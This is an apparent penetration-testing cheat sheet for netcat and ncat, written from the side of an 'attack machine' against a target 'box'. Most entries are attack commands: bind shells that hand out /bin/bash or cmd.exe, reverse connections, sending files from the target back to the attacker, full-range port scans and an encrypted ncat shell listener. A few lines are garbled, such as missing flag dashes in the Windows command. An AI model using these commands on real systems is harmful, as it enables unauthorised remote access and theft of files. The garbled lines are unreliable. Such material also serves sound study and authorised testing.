Shells and Files

Stage a listener, using verbose on attack machine

Nc -nvlp <IP> <Port>

Connect from remote box back to attack machine

Nc <IP> <Port>

To receive file on attack box

nc -l -p <Port> > out.file

Send a file from box

nc -w 3 <IP> <Port> < out.file

Setup a BIND Shell on box

Linux

nc -v -e '/bin/bash' -l -p <Port> -t

Windows

nc l p <Port> e "c:\windows\system32\cmd.exe"

Then telnet or nc to port <Port> from attack system to get the shell.

Network Utilities

Using netcat to make an HTTP request

echo -e "GET http://www.google.com HTTP/1.0nn" | nc -w 5 www.google.com 80

Making a one-page webserver; this will feed homepage.txt to all comers.

cat homepage.txt | nc -v -l -p 80

Check a udp port

Nc -vu <IP> <Port>

Scan UDP ports

nc -vzu <IP> 1-65535

To scan TCP ports simply remove the -u

nc -vz <IP> 1-65535

Ncat

Make a secure shell listener (windows bind to cmd.exe, linux to /bin/sh)

ncat --exec cmd.exe --allow 10.0.0.4 -vnl 4444 --ssl

Secure shell connector

ncat -v 10.0.0.22 4444 --ssl

.